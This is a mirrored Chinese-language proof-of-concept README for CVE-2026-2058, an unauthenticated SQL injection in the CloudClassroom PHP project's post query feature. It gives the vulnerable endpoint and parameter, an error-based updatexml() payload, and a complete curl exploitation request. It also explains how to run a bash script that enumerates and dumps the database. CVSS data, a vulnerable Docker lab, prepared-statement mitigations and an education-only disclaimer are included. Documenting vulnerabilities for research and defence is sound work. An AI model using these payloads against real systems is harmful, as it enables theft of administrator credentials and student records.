## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CARLOSALBERTOTUMA-CVE-2026-2058-POC
# CVE-2026-2058-PoC – CloudClassroom PHP 项目 SQL 注入
## 概述
_CloudClassroom PHP 项目 (v1.0)_ 的 **Post Query 功能** 中存在一个 **SQL 注入漏洞** 。
该漏洞允许攻击者通过 **`squeryx` POST 参数**注入任意 SQL 命令,从而导致**数据库枚举和数据窃取** 。
本仓库包含一个 **概念验证 (PoC) 漏洞利用程序** ,演示了如何利用该漏洞从后端数据库中窃取敏感数据。
* * *
## 漏洞信息
字段| 值
---|---
CVE| CVE-2026-2058
漏洞类型| SQL 注入
CWE| CWE-89
受影响软件| CloudClassroom PHP 项目
受影响版本| 1.0
组件| Post Query 功能
攻击向量| 远程
是否需要认证| 否
影响| 数据库泄露
严重程度| 高
攻击模式参考| CAPEC-66
* * *
## 易受攻击的端点
root@kitploit:~
POST /postquerypublic
### 易受攻击的参数
root@kitploit:~
squeryx
* * *
## 根本原因
后端代码直接将用户输入拼接进 SQL 查询,而没有进行适当的清理或使用参数化查询。
易受攻击的代码示例:
root@kitploit:~
$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";
由于 `$tempsquery` 来源于用户输入,攻击者可以注入任意 SQL。
* * *
## 易受攻击的实验环境 (Docker)
出于测试和研究目的,提供了一个易受攻击的 Docker 环境。
### 运行易受攻击的应用程序
root@kitploit:~
docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0
* * *
## 概念验证
该漏洞可通过利用 MySQL `updatexml()` 函数的**基于报错的 SQL 注入** 技术来触发。
示例载荷:
root@kitploit:~
a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1
* * *
## 手动利用
示例 `curl` 请求:
root@kitploit:~
curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "some-email@example.com" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"
预期响应:
root@kitploit:~
XPATH syntax error: '~cc_db~'
* * *
## 漏洞利用脚本
本仓库包含一个 bash 漏洞利用脚本,可自动:
* 提取**数据库名称**
* 枚举**数据表**
* 枚举**数据列**
* 转储**表数据**
### 使用方法
root@kitploit:~
chmod +x cloudclassroom_sqli_exploit.sh
./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic
示例:
root@kitploit:~
./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic
* * *
## 影响
攻击者可以:
* 枚举数据库结构
* 窃取敏感数据
* 获取管理员凭据
* 访问学生记录
* 完全攻陷后端数据库
* * *
## CVSS 评分
### NIST NVD
* 基础评分:**9.8 (严重)**
* 向量:`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
### CNA (VulDB)
* 基础评分:**7.3 (高危)**
* 向量:`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L`
⚠️ 注意:由于影响评估不同,NVD 的 CVSS 评分与 CNA (VulDB) 的评分存在差异。
* * *
## EPSS (漏洞利用预测评分系统)
漏洞利用预测评分系统 (EPSS) 用于估算漏洞在现实环境中被利用的概率。
CVE| EPSS 概率| 百分位| 日期
---|---|---|---
CVE-2026-2058| 0.00028| 7.62 %| 2026-03-01
来源:FIRST EPSS 数据集
* * *
## 缓解措施
开发人员应:
* 使用**预编译语句**
* 实施**输入验证**
* 正确转义用户输入
* 应用**最小权限数据库权限**
安全实现示例:
root@kitploit:~
$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();
* * *
## 截图
### SQL 注入利用

* * *

* * *
## 参考
* https://cwe.mitre.org/data/definitions/89.html
* https://owasp.org/Top10/2025/A05_2025-Injection/
* https://capec.mitre.org/data/definitions/66.html
* https://github.com/OWASP/www-project-web-security-testing-guide/blob/master/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md
* * *
## 免责声明
此漏洞利用程序仅供**教育和研究目的** 使用。
作者对因使用此代码而造成的**滥用或损害概不负责** 。
* * *
## 作者
**bl4dsc4n**
安全研究员